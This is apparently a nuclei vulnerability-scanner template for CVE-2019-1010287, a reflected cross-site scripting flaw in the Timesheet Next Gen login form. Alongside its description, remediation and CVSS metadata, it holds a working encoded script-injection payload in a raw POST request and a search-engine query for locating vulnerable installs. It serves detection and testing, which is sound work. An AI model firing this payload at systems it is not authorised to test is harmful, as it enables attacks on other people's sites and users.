nuclei-templates/http/cves/2019/CVE-2019-1010287.yaml

51 lines
2.2 KiB
YAML

id: CVE-2019-1010287
info:
name: Timesheet Next Gen <=1.5.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.'
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: |
Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks.
reference:
- http://www.mdh-tz.info/
- https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/
- https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40
- https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-1010287
cwe-id: CWE-79
epss-score: 0.00129
epss-percentile: 0.47354
cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: timesheet_next_gen_project
product: timesheet_next_gen
google-query: inurl:"/timesheet/login.php"
tags: cve,cve2019,timesheet,xss,timesheet_next_gen_project
http:
- raw:
- |
POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login
matchers-condition: and
matchers:
- type: word
part: body
words:
- '><script>javascript:alert(document.domain)</script>'
- type: status
status:
- 200
# digest: 490a0046304402201659279d24cbe80c6457c89097ddd2cc30d83305845c6d87bec84dcd2d37d98e0220677bdfdbaded5eb32a64a9aa6162a2713e9aed1e967a50a1eddfc650588ff3f6:922c64590222798bb761d5b6d8e72950